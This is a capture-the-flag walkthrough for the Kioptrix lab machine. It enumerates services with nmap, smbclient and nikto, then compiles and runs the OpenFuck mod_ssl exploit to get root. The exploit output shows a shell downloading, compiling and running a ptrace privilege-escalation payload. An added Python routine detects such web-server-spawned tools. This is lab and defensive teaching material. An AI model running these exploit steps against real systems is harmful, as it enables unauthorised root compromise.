This one involves a proper enumeration of the host to find an Apache web server vulnerable to the OpenFuck exploit, which gives root access directly.

Find the target machine (2 methods)

nmap -sP TARGET_NETWORK/24|grep 192

netdiscover -r TARGET_NETWORK/24


Initial scan

root@kali:# mkdir nmap; nmap -sC -sV -oA nmap/initial TARGET_IP
        Starting Nmap 7.70 ( ) at 2018-07-24 14:44 WAT
        Nmap scan report for TARGET_IP
        Host is up (0.00054s latency).
        Not shown: 994 closed ports
        22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
        | ssh-hostkey:
        |   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
        |   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
        |_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
        |_sshv1: Server supports SSHv1
        80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
        | http-methods:
        |_  Potentially risky methods: TRACE
        |_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-title: Test Page for the Apache Web Server on Red Hat Linux
        111/tcp  open  rpcbind     2 (RPC #100000)
        | rpcinfo:
        |   program version   port/proto  service
        |   100000  2            111/tcp  rpcbind
        |   100000  2            111/udp  rpcbind
        |   100024  1           1024/tcp  status
        |_  100024  1           1024/udp  status
        139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
        443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
        |_http-title: 400 Bad Request
        |_ssl-date: 2018-07-24T13:57:13+00:00; +12m25s from scanner time.
        | sslv2:
        |   SSLv2 supported
        |   ciphers:
        |     SSL2_DES_192_EDE3_CBC_WITH_MD5
        |     SSL2_RC2_128_CBC_WITH_MD5
        |     SSL2_RC4_64_WITH_MD5
        |     SSL2_RC4_128_WITH_MD5
        |     SSL2_RC4_128_EXPORT40_WITH_MD5
        |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
        |_    SSL2_DES_64_CBC_WITH_MD5
        1024/tcp open  status      1 (RPC #100024)
        MAC Address: 00:0C:29:93:FC:AA (VMware)

        Host script results:
        |_clock-skew: mean: 12m24s, deviation: 0s, median: 12m24s
        |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
        |_smb2-time: Protocol negotiation failed (SMB2)

So we have:
- 22 OpenSSH version 2.9p2
- 80 Apache 1.3.20 (mod_ssl/2.8.4 + OpenSSL/0.9.6b)
- 111 RPC
- 139 Samba (workgroup MYGROUP)
- 443 Apache SSL of the same server
- 1024 RPC

OK, it seems we have to deal with SSL or Samba.


Trying to get the version of Samba used

root@kali:# smbclient -L TARGET_IP -N
    WARNING: The "syslog" option is deprecated
    Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
    Reconnecting with SMB1 for workgroup listing.
    Server does not support EXTENDED_SECURITY  but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
    Anonymous login successful

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------

enum4linux returns the same result because it uses the smbclient binary too, so I cannot grab the version number. Let's move on to SSL (see the addition at the end of this article).


Launch a web server scanner; it will quickly find some useful information, as the web server is pretty old now...

root@kali:# nikto -host TARGET_IP -port 443
    + OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
    + OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
    + OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
    + mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell., OSVDB-756.



The last finding is related to the OpenFuckV2 exploit (764.c):

root@kali:# head 764.c
     * E-DB Note: Updating OpenFuck Exploit ~
     * OF version r00t VERY PRIV8 spabam
     * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
     * objdump -R /usr/sbin/httpd|grep free to get more targets
     * #hackarena

root@kali:# gcc -o OpenFuck 764.c -lcrypto
    764.c:20:10: fatal error: openssl/ssl.h: No such file or directory
     #include <openssl/ssl.h>
    compilation terminated.

OK, it seems we are missing some packages.


To work around this I had to install libssl & libssl-devel, then compile the exploit.

apt install libssl-dev libssl1.0-dev
gcc -o OpenFuck 764.c -lcrypto

First read the usage section, then select the target number matching the web server version (0x6a or 0x6b).

    : Usage: ./OpenFuck target box [port] [-c N]
      target - supported box eg: 0x00
      box - hostname or IP address
      port - port for ssl connection
      -c open N connections. (use range 40-50 if u dont know)

root@kali:# ./OpenFuck |grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

Finish by executing the exploit; you will be logged in as root at the end of the process.

root@kali:# ./OpenFuck 0x6b TARGET_IP -c 50
    * OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
    * by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
    * #hackarena                                     *
    * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
    * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
    * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

    Connection... 50 of 50
    Establishing SSL connection
    cipher: 0x4043808c   ciphers: 0x80f8088
    Ready to send shellcode
    Spawning shell...
    bash: no job control in this shell
    exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
               => `ptrace-kmod.c'
    Connecting to connected!
    HTTP request sent, awaiting response... 301 Moved Permanently
    Location: [following]
               => `ptrace-kmod.c'
    Connecting to connected!
    HTTP request sent, awaiting response... 200 OK
    Length: 3,921 [text/x-csrc]

        0K ...                                                   100% @   3.74 MB/s

    06:55:20 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

    [+] Attached to 1039
    [+] Waiting for signal
    [+] Signal caught
    [+] Shellcode placed at 0x4001189d
    [+] Now wait for suid shell...
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
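The output above shows what this chain looks like from the host's side: the web server process spawns a shell, which fetches ptrace-kmod.c with wget, compiles it with gcc and runs the result. As an added example (not part of the original walkthrough), here is a Python detection routine over a constructed set of process-execution events that flags exactly that pattern: shells, downloaders and compilers run by the web server user underneath httpd. The event records, pids and the EXAMPLE_HOST download URL are constructed for the example (the page does not show the real host), and the field names and function names are my own rather than any EDR or auditd schema.

```python
import os

# Constructed process-execution events (not real logs): a simplified view of what an
# EDR or auditd execve trail would record while the chain above runs. The pids are
# made up and the download URL is a placeholder; the original host is not on this page.
EVENTS = [
    {"pid": 800,  "ppid": 1,    "user": "root",   "cmd": "/usr/sbin/httpd"},
    {"pid": 1039, "ppid": 800,  "user": "apache", "cmd": "/usr/sbin/httpd"},
    {"pid": 1040, "ppid": 1039, "user": "apache", "cmd": "/bin/bash -i"},
    {"pid": 1041, "ppid": 1040, "user": "apache", "cmd": "wget http://EXAMPLE_HOST/ptrace-kmod.c"},
    {"pid": 1042, "ppid": 1040, "user": "apache", "cmd": "gcc -o p ptrace-kmod.c"},
    {"pid": 1043, "ppid": 1040, "user": "apache", "cmd": "./p"},
    # Benign noise: cron running logrotate through a shell as root, not under httpd.
    {"pid": 1100, "ppid": 1,    "user": "root",   "cmd": "/usr/sbin/crond"},
    {"pid": 1101, "ppid": 1100, "user": "root",   "cmd": "/bin/sh -c /usr/sbin/logrotate /etc/logrotate.conf"},
]

WEB_USERS = {"apache", "www-data", "nobody"}
SUSPICIOUS = {
    "shell": {"bash", "sh", "dash"},
    "downloader": {"wget", "curl", "ftp"},
    "compiler": {"gcc", "cc", "g++"},
}


def executable_name(cmd):
    """'/bin/bash -i' -> 'bash'."""
    return os.path.basename(cmd.split()[0])


def classify(cmd):
    """Return the suspicious category of a command line, or None if it is not tracked."""
    name = executable_name(cmd)
    for category, names in SUSPICIOUS.items():
        if name in names:
            return category
    return None


def descends_from(event, ancestor_name, by_pid):
    """Walk the ppid chain and report whether any ancestor runs the given executable."""
    while event["ppid"] in by_pid:
        event = by_pid[event["ppid"]]
        if executable_name(event["cmd"]) == ancestor_name:
            return True
    return False


def detect_httpd_spawned_tools(events):
    """Alert on shells, downloaders and compilers run by the web server user under httpd.

    A web server has no business spawning these. The chain in the output above
    (bash, then wget of the exploit source, then gcc) yields three alerts; the
    cron/logrotate shell is ignored because it runs as root outside the httpd tree."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        category = classify(event["cmd"])
        if (category and event["user"] in WEB_USERS
                and descends_from(event, "httpd", by_pid)):
            alerts.append((event["pid"], category, event["cmd"]))
    return alerts


if __name__ == "__main__":
    for pid, category, cmd in detect_httpd_spawned_tools(EVENTS):
        print(f"ALERT pid={pid} {category}: {cmd}")
```

The rule keys on process ancestry plus the effective user rather than on any string from the exploit, so it also catches the same post-exploitation pattern with a different payload; in a real deployment the `EVENTS` list would be fed from execve auditing and the user set adjusted to the account the web server actually runs as.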


After reading some other walkthroughs of this box, it seems I have an issue with my enum4linux report, which should have given me a version number. So I reloaded the OffSec Kali box (2018.2) and even from scratch I cannot get the Samba version with a simple smbclient -L TARGET_IP ...